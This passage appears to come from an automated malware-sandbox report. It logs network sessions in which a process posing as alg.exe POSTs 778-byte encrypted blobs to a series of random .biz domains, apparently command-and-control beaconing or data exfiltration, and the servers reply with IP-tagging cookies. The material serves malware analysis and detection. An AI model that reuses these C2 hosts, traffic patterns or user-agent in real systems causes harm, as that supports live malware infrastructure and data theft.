                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585484982 CET778OUTData Raw: 33 bc f3 85 18 b9 3d 28 fe 02 00 00 70 5b 37 72 a5 41 c9 f8 29 a3 01 99 62 fb 79 14 9f f4 55 ca a1 56 b9 52 31 93 7c 6f dd f5 bd 0c b2 ce 51 bc 0f 47 5d c6 32 76 72 32 6f 09 8a 70 3b 14 62 b6 cc 0c 24 52 cb 6f c5 c7 f0 34 5c 40 3c 55 99 e6 15 91
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 3=(p[7rA)byUVR1|oQG]2vr2op;b$Ro4\@<U8Ml-x;|]p"KSd[>9&;'O`Su'h2`h]6:p$'fWo\gW_"$t]X5P*R>*R69^GTAaMM|C2J2]rb6


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  83192.168.2.550059172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.246095896 CET347OUTPOST /dp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.246130943 CET778OUTData Raw: 91 87 e4 c3 30 f8 e5 04 fe 02 00 00 a6 c3 35 0d 18 84 16 7b 1b a3 6a 38 21 ad 9f c7 f5 b5 14 34 0c 3a 74 20 76 56 d2 a4 2e 80 03 40 b9 71 fe 3b 61 b9 46 dd 1b 37 4c 05 0c d0 17 50 fd a9 f2 b4 dd e5 ac e1 e5 dc 7a f1 94 9f f6 50 71 c4 73 d2 cb 25
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 05{j8!4:t vV.@q;aF7LPzPqs%O+KM4%xZPOXa_'`8"qLBmmpz_c?D-(X/en0G)RWwt+:R#.!E_Sa7}1/Zk


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  84192.168.2.55006054.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.162542105 CET348OUTPOST /euqwv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.162570953 CET778OUTData Raw: 24 e4 1a 8a af d3 e3 ad fe 02 00 00 83 e9 06 4e d4 57 f4 dc 18 c7 8e c8 b2 fa 2f 76 67 2a 3c c1 cf 0e dc 34 14 bf 2d e5 93 2d 3e b9 a8 d2 73 60 ac 2c 6a a5 ae 48 be 7a 15 6f ba 0d 58 50 03 29 30 88 d1 e9 01 8a 59 49 b2 e4 6e dc d2 fb 69 3a b0 15
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: $NW/vg*<4-->s`,jHzoXP)0YIni:iCW8,?_=*T!yT"RM]6Rq,_;1py ?|a]J|zj;|S!*jKEq?Y"3g8EdGD,L+u%zL<p
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.176521063 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bf635b8cb8997ff95c6099820b73627f|155.94.241.188|1730130723|1730130723|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  85192.168.2.55006144.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.200233936 CET356OUTPOST /tlbvmelxpwjipdp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.200253963 CET778OUTData Raw: 7e 19 c3 86 67 f6 a6 ad fe 02 00 00 f1 45 92 69 1c ea 5a 44 80 ce c1 34 0b 26 a9 6b 92 c6 d8 d6 29 b8 4b f3 e7 7b 81 51 eb 29 66 c8 d7 f4 95 a7 ea 25 0d d8 43 5e ab 52 f2 35 ec 80 16 f9 84 fa bc 5f e0 eb f4 d3 c6 59 a6 7a 34 f4 4d 05 38 88 9a 68
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ~gEiZD4&k)K{Q)f%C^R5_Yz4M8hjAUDk4bg?v3K1(*^H~KGFqeIL1-]g[KMKy>w7+4 ?mw{]2^RbVT&gz4F)Jh
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.877710104 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a2a6f6f45defcacd9251f0eb07875faf|155.94.241.188|1730130724|1730130724|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  86192.168.2.55006234.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.902137995 CET351OUTPOST /pffvqbu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.902153969 CET778OUTData Raw: 76 3a 74 a4 31 21 bb 1a fe 02 00 00 d7 24 6f 37 38 09 c2 b9 89 c7 31 6e b8 12 b4 71 98 75 37 4d 27 0f d7 10 00 01 38 54 65 af f9 61 9b 53 b9 47 68 02 a6 ac 50 1f 91 ac 9d ae 6f b1 41 d5 64 90 df dc dc 67 94 80 cb 9d 91 50 ce a1 9f e1 cc 87 58 d1
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: v:t1!$o781nqu7M'8TeaSGhPoAdgPX}[Ry19Ku}9dqh6^Q<$rU7GZ+7}P)]_cLN{<#7e%gQGW)RAD b)GArE!;M_MpE
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.731158018 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3f96aa0f2c261112bd17a11963e9cbfc|155.94.241.188|1730130725|1730130725|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  87192.168.2.55006334.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.856065035 CET355OUTPOST /vebfxvjlhsxr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.856118917 CET778OUTData Raw: 04 83 df 36 1d 12 e4 4b fe 02 00 00 53 a2 1a 70 45 9c 68 d2 6c 40 a8 0b 1d 25 47 de 3d 04 72 0d 41 2c 99 32 84 ad 13 f8 f9 5c a4 bf 54 46 19 5c 68 8e e2 f6 bb da 84 46 2a c7 d1 2e 48 5b e1 c7 fb 86 80 cc 6a d7 14 02 d5 a0 c1 85 c0 8b 7e cb e1 88
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6KSpEhl@%G=rA,2\TF\hF*.H[j~r}3cejy*Gc[Ql@IN|Y)2AlQYAJirD%(J#bk$W!Luy}r@3-@i=yTIisTsM59RU2@h?
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.679814100 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=11bcfdadd795d4820c7ac57c1dcb87fa|155.94.241.188|1730130726|1730130726|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  88192.168.2.55006434.246.200.160802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887774944 CET347OUTPOST /luseoc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887804985 CET778OUTData Raw: c5 61 c8 52 24 49 3a b9 fe 02 00 00 6b 67 ed 81 3e e5 d7 cc ab 8f 8d cb 56 eb 43 7f dc 43 1c b7 c4 59 72 a3 be c0 94 e4 21 d5 2f eb 7a 13 f4 8b cc 7d 62 4d bd fd b2 48 d7 c9 6c 98 77 97 bd 4b 9e 02 e4 e1 66 3b fc fc 9a 65 2c ca ad a2 e0 fd 64 ca
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: aR$I:kg>VCCYr!/z}bMHlwKf;e,d|a[B(|GXgtRr3Q09f\AQ<wlK~7l<+!/EOdGJnPO^yC5+<k{@
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.864963055 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1e9440d992cbd4b414ef41f58da5c78b|155.94.241.188|1730130727|1730130727|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  89192.168.2.55006518.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893467903 CET351OUTPOST /ngujcsu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893503904 CET778OUTData Raw: bb 1e 36 99 1c 7f c4 1a fe 02 00 00 57 04 6c fc 05 52 a8 21 8f d9 14 57 cd 1b 25 44 a3 29 ea 81 bd d8 a8 12 d8 1d 87 80 63 43 a2 9c 4c 98 11 7b 00 94 d4 b2 33 bd 93 9d 40 15 92 9e f1 d6 3a 5b d3 7c 7a 44 13 39 b0 e8 75 b9 d0 e0 96 1f 8c 2f ad af
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6WlR!W%D)cCL{3@:[|zD9u/ME0*o5X>/4n b#z2X9?-{Qj9*d0rG,&DRhzQ~=LL8#;rB-l& 4_;NR'
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.790822983 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5d72ff8c7be6b9a0f5d7f9d49e9311a9|155.94.241.188|1730130728|1730130728|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  90192.168.2.55006647.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813956976 CET355OUTPOST /iljbyhyeqa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813987017 CET778OUTData Raw: 7d 2c 24 20 b1 dc 74 56 fe 02 00 00 0c 0e 86 87 f1 af ec 37 e6 13 61 75 ed 8b f1 65 47 cb 7b 45 cb 6e 21 dc c2 88 84 ca ae e6 65 5f 5e ad 4a 70 32 eb 37 93 e6 b9 b2 2c a9 98 94 87 db bb bc dc f7 7c 17 7c 47 d9 68 52 a0 d2 1b aa 3e be ce 23 d1 89
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: },$ tV7aueG{En!e_^Jp27,||GhR>#DC 8S2zZ:~kOJ*8&W_@b{r1O]Eh0nFC-12m6)=Sa\3T0`
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.247664928 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cb34769752192bd60357b93d9929a8d4|155.94.241.188|1730130729|1730130729|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  91192.168.2.55006713.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371886015 CET350OUTPOST /ysihuw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371917963 CET778OUTData Raw: 36 79 fd fb 0e a0 bd 57 fe 02 00 00 61 cd bd eb 8f 8b 40 e3 d4 6c 3c 7b 0e 61 74 32 ed 88 04 fe a5 1f 6b aa 3e ef 6e e6 03 8b b5 c1 2a 70 21 3a 75 4f d2 f9 7d f3 fd 79 82 b8 90 10 30 5c 3a b3 89 22 59 8f e6 e8 17 8c 0e bc b9 c3 a1 e3 fe d6 23 34
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6yWa@l<{at2k>n*p!:uO}y0\:"Y#4o]'h3xLz05zhA$cMHWc93Ij^yO!8B'ECgBzU[<[%i*u$/pG$YM(EMF-'{8
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.836721897 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=64916621fa3f43fcc8fee95264eaef8f|155.94.241.188|1730130731|1730130731|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  92192.168.2.55006818.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859622955 CET350OUTPOST /cbrxaago HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859649897 CET778OUTData Raw: 58 6a de f6 03 cf c2 57 fe 02 00 00 40 e6 55 44 df 72 a3 bc 92 ba 75 e8 ce 1c a6 99 ec e3 fc 35 57 14 7d 1d 32 4e 8d 20 e5 66 1f b5 8a 30 12 5e 0a 14 07 87 f3 3f 34 63 2b 83 b4 75 f4 1d dc c8 a1 5d 39 58 a1 b1 ef 5c 66 99 e1 65 ae 5e 0e 87 f1 a9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: XjW@UDru5W}2N f0^?4c+u]9X\fe^Jj6@rx;KT5>acA$"x|=wGW6m]mLSEy>\om_*TMG0H*I7~J*d.N ?;t`l,r$z9}
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.522706032 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ac6ea345b9a274c0bdfb90f64cc2363b|155.94.241.188|1730130732|1730130732|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
